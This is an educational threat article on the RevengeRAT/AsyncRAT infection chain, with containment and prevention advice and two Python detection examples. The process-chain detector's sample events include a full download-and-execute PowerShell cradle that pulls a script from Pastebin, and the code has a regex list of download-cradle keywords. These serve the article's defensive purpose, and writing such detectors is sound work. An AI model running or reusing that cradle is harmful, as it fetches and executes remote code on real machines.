
Learning objectives

After reading this article you will be able to:

  • Technical information and threat behavior
  • Keeping 

The Backdoor RAT and loader evasion techniques

A Remote Access Trojan (RAT) is a backdoor that gives an attacker remote control of an infected device, from which further attacks can be launched. RAT loaders typically rely on obfuscation, weaponization of otherwise benign files, encryption of their payloads, and remote execution of later stages to evade detection.

One backdoor RAT catalogued by Microsoft is AsyncRAT. It has no aliases listed and is closely related to RevengeRAT, also known as Revenge.

RevengeRAT is known to infect devices through malicious ads on compromised websites and through malicious email attachments. In spear-phishing campaigns it is delivered as a Visual Basic script inside .rar, .zip, or .doc attachments. Attackers also send emails or links with embedded images that redirect users to cloud hosting services such as OneDrive, iCloud Drive, and Google Drive, where the malware is hosted.

How is it tackled? 

Microsoft Defender Antivirus removes this threat automatically as soon as it detects it. With cloud-delivered protection enabled, the device receives the latest defenses against new and unknown malware. Without it, update the anti-malware software and run a full scan to rule out the threat.

If the threat is detected, the following containment measures reduce its impact:

  • Isolate the affected device immediately: there is a high chance the malicious code has already run and the device is under the attacker's control.
  • Treat every account used on the affected device as compromised. Disable those accounts or reset their passwords.
  • Investigate the infected endpoints thoroughly to determine how the malware got in, including a review of email and web traffic.
  • Scrutinize the device timeline for signs of lateral movement carried out with one of the compromised accounts.
  • Check for tools dropped on the devices; such tools are used to harvest credentials, enable lateral movement, or carry out other attacks.

Technical information and threat behavior

Multiple operators use the RevengeRAT malware. The family shares code, behavior, and TTPs (tactics, techniques, and procedures) with other publicly available malware such as AsyncRAT, LimeRAT, NetWire, QuasarRAT, CyberGate, ClipBanker, Vjw0rm, WSHRAT, and many other unnamed families.

Process of attack

When the user opens the downloaded Visual Basic script, wscript.exe runs it. The script launches PowerShell, which connects to Pastebin and downloads a second-stage script known as SysTray.PS. That script spawns an additional process to establish persistence, collects the targeted data, and connects back to the attacker's command-and-control (C2) server, to which the collected data is exfiltrated.
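The chain above (a script host spawning PowerShell that pulls a second stage from Pastebin) is something a detection engineer can look for in process-creation telemetry. The following is an added example, not code from the original article or from Microsoft: it scans a batch of constructed process-creation events (fields modelled on Sysmon Event ID 1: pid, ppid, image, command line) and flags PowerShell processes whose parent is wscript.exe or cscript.exe and whose command line references pastebin.com or a download cradle. The hostnames, file names, and event records are constructed for this example.

```python
"""Added example: flag the wscript.exe -> powershell.exe -> Pastebin download chain
in process-creation events. Events and command lines below are constructed; they
are not real telemetry from the article."""

import re
from typing import Dict, List

# Constructed sample events: one benign PowerShell use (backup script launched from
# explorer.exe) and one instance of the described chain.
EVENTS: List[Dict] = [
    {"ts": "2024-01-01T10:00:01", "pid": 100, "ppid": 1,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"ts": "2024-01-01T10:00:05", "pid": 200, "ppid": 100,
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\invoice.vbs"'},
    {"ts": "2024-01-01T10:00:06", "pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('https://pastebin.com/raw/abcd1234')\""},
    {"ts": "2024-01-01T10:05:00", "pid": 400, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
PASTE_SITE = re.compile(r"pastebin\.com", re.IGNORECASE)
# Common PowerShell download cradles; the list is an assumption of this example.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_script_to_powershell_chains(events: List[Dict]) -> List[Dict]:
    """Return one finding per PowerShell process spawned by a Windows script host whose
    command line pulls content from Pastebin or uses a download cradle."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) != "powershell.exe":
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]) not in SCRIPT_HOSTS:
            continue
        reasons = []
        if PASTE_SITE.search(e["cmdline"]):
            reasons.append("pastebin")
        if DOWNLOAD_CRADLE.search(e["cmdline"]):
            reasons.append("download-cradle")
        if reasons:
            findings.append({
                "ts": e["ts"],
                "pid": e["pid"],
                "parent": basename(parent["image"]),
                "parent_cmdline": parent["cmdline"],
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in find_script_to_powershell_chains(EVENTS):
        print(finding)
```

The parent-child relationship is the stronger signal: a script host launching PowerShell is rare in normal use, while the Pastebin and cradle patterns are easy for an operator to change, so in production the parent check should remain even as the string patterns are tuned.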

How to prevent malware infections on your device?

Tips for end users

  • Keep widely used software such as web browsers, Microsoft Office, and Java up to date so that known vulnerabilities are patched; recent versions of Windows can install updates automatically. Adobe Flash Player reached end of life at the end of 2020 and should be uninstalled rather than kept up to date.
  • Be wary of suspicious emails and messages in other messaging tools. Malicious links and attachments are a common delivery vector, and opening them can compromise the system. Microsoft Office 365, for example, includes link protection, spam filtering, and anti-malware.
  • Watch out for malicious websites and avoid visiting them, since a single visit can infect a device. One check is to inspect the domain name that should represent the company: any misspelling is a warning sign. Many malicious sites swap a letter in a genuine name for a look-alike character, such as the letter O for the digit 0 or the lowercase letter l for the digit 1. If the genuine site is Article.com and the address reads Artic1e.com, the site is suspect and should be avoided.
  • Sites that throw up aggressive, constant pop-ups are trying to trick users into clicking them and falling prey to an attack.
  • Avoid pirated content; it is not only illegal but also a common carrier of malware.
  • Download music, apps, and movies only from official websites and app stores.
  • Do not attach flash drives or other removable drives from unknown sources; malware can spread from such drives onto the device.
  • Use a non-administrator account for day-to-day work. Malware that launches runs with the privileges of the active user: under an administrator account it has effectively unlimited privileges, while under a standard account its privileges are restricted and the damage is contained.

Tips for organization IT administrators
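The look-alike domain check in the tips above (letter O swapped for the digit 0, lowercase l swapped for the digit 1, as in Artic1e.com for Article.com) can be automated by folding confusable characters before comparing a hostname with a list of trusted domains. The following is an added example, not code from the original article: it goes slightly beyond the text by folding a few additional confusables (5/s, 3/e, 8/b, vv/w, rn/m), which is an assumption of this example, and it treats only the second-level label as the brand, which is adequate for .com-style names but not for multi-label public suffixes. The trusted list and the tested hostnames are constructed.

```python
"""Added example: detect character-swap look-alike domains by folding confusable
characters before comparing against trusted domains. Not from the original article."""

from typing import List, Optional

# Confusable characters folded to the letter they imitate. The article names only
# 0 -> o and 1 -> l; the other entries extend the idea and are an assumption here.
CONFUSABLES = {
    "vv": "w", "rn": "m",           # multi-character confusables handled first
    "0": "o", "1": "l", "|": "l", "5": "s", "3": "e", "8": "b",
}


def fold_confusables(label: str) -> str:
    """Lower-case a label and replace confusable sequences, longest keys first."""
    s = label.lower()
    for key, repl in sorted(CONFUSABLES.items(), key=lambda kv: -len(kv[0])):
        s = s.replace(key, repl)
    return s


def registrable_label(hostname: str) -> str:
    """Second-level label of a hostname ('article' for 'www.artic1e.com').
    Assumes a single-label public suffix such as .com; production code should
    consult the public suffix list instead."""
    parts = hostname.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def lookalike_of(hostname: str, trusted: List[str]) -> Optional[str]:
    """Return the trusted domain that `hostname` imitates, or None.

    A hostname that is a trusted domain or one of its subdomains is not a
    look-alike. A hostname whose folded brand label equals a trusted brand label
    is flagged (the raw labels necessarily differ, since exact matches are excluded)."""
    host = hostname.lower().strip(".")
    trusted_lower = [t.lower() for t in trusted]
    if host in trusted_lower or any(host.endswith("." + t) for t in trusted_lower):
        return None
    folded = fold_confusables(registrable_label(host))
    for t in trusted_lower:
        if folded == fold_confusables(registrable_label(t)):
            return t
    return None


if __name__ == "__main__":
    # Constructed inputs; 'article.com' is the article's own hypothetical brand.
    trusted_domains = ["article.com", "google.com"]
    for candidate in ["article.com", "login.article.com", "artic1e.com",
                      "www.ARTIC1E.com", "g00gle.com", "example.org"]:
        print(f"{candidate:20} -> {lookalike_of(candidate, trusted_domains)}")
```

This catches the substitution trick the tips describe, but not every impersonation technique: internationalized domain names using Unicode homoglyphs and subdomain tricks such as article.com.example.net need separate handling (Punycode inspection and suffix-aware parsing respectively).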

Keep operating systems and application software on their latest versions; versions earlier than Windows 10 should not be used. Turning on automatic updates deploys security patches as soon as they become available.

    Keeping  

Effective antivirus software raises an alert when it detects a threat on the device and immediately removes or quarantines the malware.
